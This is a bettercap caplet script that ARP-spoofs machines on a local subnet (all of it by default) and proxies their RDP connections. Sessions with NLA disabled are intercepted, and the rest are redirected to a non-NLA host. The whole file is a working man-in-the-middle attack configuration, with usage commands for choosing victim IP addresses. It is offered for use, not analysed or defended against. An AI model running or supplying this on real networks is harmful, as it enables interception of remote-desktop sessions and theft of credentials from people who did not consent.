# This module lets you arp spoof desired targets, and proxy their RDP connections if they have NLA disabled.
# If they don't, we redirect their RDP connection to a vulnerable host
# 
# Targets the whole subnet by default. Can be configured in bettercap or in this file.
#   
# To change arp-spoofed targets :
#	sudo ./bettercap -caplet rdp-sniffer.cap -eval "set arp.spoof.targets 192.168.0.50, 192.168.0.51;"
#
# To change RDP proxy targets :
#	sudo ./bettercap -caplet rdp-sniffer.cap -eval "set rdp.proxy.targets 192.168.0.50;"
#
# To change both targets :
#	sudo ./bettercap -caplet rdp-sniffer.cap -eval "set arp.spoof.targets 192.168.0.50, 192.168.0.51; set rdp.proxy.targets 192.168.0.50;"

# Setup arp spoofing
set arp.spoof.internal true

# Setup targets (Uncomment to specify target)
#set arp.spoof.targets 192.168.0.50, 192.168.0.51
#set rdp.proxy.targets 192.168.0.50

# Setup NLA exploits
set rdp.proxy.nla.seccheck ~/rdp-sec-check/rdp-sec-check.pl
set rdp.proxy.nla.mode REDIRECT

set rdp.proxy.nla.redirectip YOUR_NON_NLA_HOST
set rdp.proxy.nla.redirectport 3389

# Start everything
arp.spoof on
rdp.proxy on

# Silence net.recon to avoid useless spam
events.ignore endpoint

# Start fresh
events.clear
clear
